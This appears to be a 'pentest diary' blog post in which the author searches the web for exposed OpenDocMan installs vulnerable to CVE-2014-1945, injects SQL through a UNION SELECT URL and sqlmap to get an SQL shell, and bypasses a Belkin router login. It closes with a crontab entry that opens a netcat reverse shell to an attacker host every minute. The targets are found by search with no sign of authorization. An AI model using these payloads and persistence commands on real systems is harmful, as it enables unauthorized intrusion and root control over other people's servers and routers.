Pentest Diary - 1

An SQLi

Find a target by googling

  • Yea, before googling for your target, do a research on your target system, pay attention to:

    • Version number on every page?
    • Identical keywords?
    • What's in the target URL?
    • Use - to avoid irrelevant search results

  • My google search results for CVE-2014-1945

    "welcome to opendocman" "opendocman v1.2.7"

    google cve20141945

  • As you can see, I used several keywords to filter the results

    opendocman

Fire up sqlmap

  • From Exploit-DB, we got an SQLi point, which looks like:

    http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v ersion%28%29,3,4,5,6,7,8,9

  • With sqlmap, we can use that SQLi to achieve whatever we want,

    sqlmap -u "http://[host]/ajax_udf.php?q=1&add_value=odm_user" --dbs

  • Finally we got an SQL shell

    sql shell

Google for vulnerable routers

  • Belkin router is widely used in Europe by small business users, yet its vulnerabilities are so damn unbelievable, like this one...

    belkin login bypass

    Try a login and see what happens

    password

  • Now we have the password, the admin panel is ours

A reverse shell using netcat on OpenWRT

  • Simply write to crontab
echo '*/1 * * * *  rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <master_ip> <port> >/tmp/f' >> /etc/crontabs/root

  • nc -nlvp <port> on your machine, and you will get a root shell from that router within a minute

    shell

Comments

comments powered by Disqus